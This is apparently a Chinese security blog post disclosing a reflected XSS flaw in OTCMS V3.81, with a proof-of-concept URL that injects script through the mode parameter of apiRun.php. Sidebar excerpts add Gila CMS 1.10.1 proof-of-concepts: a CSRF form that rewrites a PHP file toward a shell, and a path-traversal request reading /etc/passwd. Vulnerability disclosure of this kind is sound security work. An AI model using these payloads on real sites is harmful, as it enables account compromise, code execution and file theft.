OTCMS 反射型XSS漏洞

一、漏洞摘要

漏洞名称: OTCMS 反射型XSS漏洞
上报日期: 2019-05-1
漏洞发现者: topsec_lizhongcheng
产品首页: http://otcms.com
版本: V3.81

二、漏洞概述


apiRun.php 在处理mode参数没有进行过滤,直接输出到页面,造成反射型xss漏洞

poc:

http://192.168.3.51/OTCMS/apiRun.php?mudi=autoRun&mode=";alert(document.domain);"



评论

发表评论

此博客中的热门博文

Gila CMS 1.10.1 CSRF 漏洞

图片
一、漏洞摘要 漏洞名称: Gila CMS 1.10.1 CSRF 漏洞 上报日期: 2019-04-22 漏洞发现者: topsec_lizhongcheng 产品首页:  https://gilacms.com 版本: V1.10.1 二、漏洞概述  后台修改文件处没有token验证,导致csrf漏洞的发生,构造对应的exp可导致getshell 文件:/src/core/controllers/fm.php 构造如下代码,保存为html文件并打开,将成功触发漏洞 <html>   <body>   <script>history.pushState('', '', '/')</script>     <form action="http://192.168.3.21/gila-1.10.1/fm/save" method="POST">       <input type="hidden" name="contents" value="&lt;&#63;php&#10;&#47;&#42;&#33;&#10;&#32;&#42;&#32;Gila&#32;CMS&#10;&#32;&#42;&#32;Copyright&#32;2017&#45;19&#32;Vasileios&#32;Zoumpourlis&#10;&#32;&#42;&#32;Licensed&#32;under&#32;BSD&#32;3&#45;Clause&#32;License&#10;&#32;&#42;&#47;&#10;phpinfo&#40;&#41;&#59;&#10;exit&#40;&#41;&#5
阅读全文

Gila CMS 1.10.1 任意文件下载漏洞

图片
一、漏洞摘要 漏洞名称: Gila CMS 1.10.1 任意文件下载漏洞 上报日期: 2019-04-24 漏洞发现者: topsec_lizhongcheng 产品首页:  https://gilacms.com 版本: V1.10.1 二、漏洞概述 普通用户在下载文件时没有对路径进行过滤,导致可以下载系统文件,造成信息泄露 文件: /src/core/classes/db_backup.php poc: http://192.168.1.112/gila-1.10.1/admin/db_backup?download=/etc/passwd
阅读全文